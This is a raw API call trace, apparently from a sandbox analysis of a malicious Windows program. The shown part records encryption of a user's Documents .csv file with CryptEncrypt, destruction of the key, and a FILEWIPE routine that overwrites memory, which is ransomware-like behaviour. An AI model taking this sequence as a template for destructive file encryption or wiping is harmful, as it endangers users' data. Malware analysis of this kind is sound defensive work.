lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] CharLowerBuffW (in: lpsz="byte[23249]", cchLength=0xb | out: lpsz="byte[23249]") returned 0xb [0180.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.334] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.335] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf55c8*, pdwDataLen=0x87e820*=0x5acd, dwBufLen=0x5ad0 | out: pbData=0xbf55c8*, pdwDataLen=0x87e820*=0x5ad0) returned 1 [0180.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.355] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.355] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.356] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.356] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.356] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.356] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.356] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.360] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.360] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.361] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.361] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.361] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0180.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.361] CryptDestroyKey (hKey=0x90af18) returned 1 [0180.361] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.361] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.361] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.361] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.361] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.361] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.361] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.361] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0180.361] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.361] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.362] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.362] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.362] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.362] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.362] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.362] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.362] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0180.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.363] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.363] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.363] FreeLibrary (hLibModule=0x74f20000) returned 1 [0180.363] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.363] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.363] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.364] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.367] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.367] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0180.367] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.368] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.368] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0x90ae18 [0180.368] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0180.369] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0180.369] CharLowerBuffW (in: lpsz="byte[23245]", cchLength=0xb | out: lpsz="byte[23245]") returned 0xb [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.370] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.370] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0180.370] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0180.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.371] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.371] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2898 [0180.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0180.372] FreeLibrary (hLibModule=0x75c90000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0180.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | 